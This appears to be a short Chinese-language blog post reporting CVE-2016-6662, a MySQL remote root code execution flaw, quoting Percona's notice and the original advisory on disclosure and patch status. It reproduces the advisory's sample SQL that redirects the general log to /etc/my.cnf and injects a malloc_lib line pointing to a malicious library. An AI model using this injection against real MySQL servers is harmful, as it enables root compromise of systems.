包含 MySQL 本家與所有從 MySQL 改出去的分支都中了,引用 Percona 的通報:「Percona Server Critical Update CVE-2016-6662」。
This is a CRITICAL update, and the fix mitigates the potential for remote root code execution.
原始的 security advisory 在「CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )」這邊,雖然是標 0day,但發現的人在七月時就有先通報給 vendor 們讓他們有時間修正:
The vulnerability was reported to Oracle on 29th of July 2016 and triaged by the security team. It was also reported to the other affected vendors including PerconaDB and MariaDB.
Oracle 還沒修正,也就是 upstream 目前仍然是有問題的,目前得靠其他 vendor 修正:
Official patches for the vulnerability are not available at this time for Oracle MySQL server.
其中 Percona 與 MariaDB 都已經先推出修正版本了:
The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of 30th of August.
然後看了一下這個漏洞,從 SQL 指令可以做檔案操作一路打出來... 可以看到範例:
mysql> set global general_log_file = '/etc/my.cnf';
mysql> set global general_log = on;
mysql> select '
'>
'> ; injected config entry
'>
'> [mysqld]
'> malloc_lib=/tmp/mysql_exploit_lib.so
'>
'> [separator]
'>
'> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;
這下苦了...
報告長輩...
https://www.percona.com/blog/2016/09/12/database-affected-cve-2016-6662/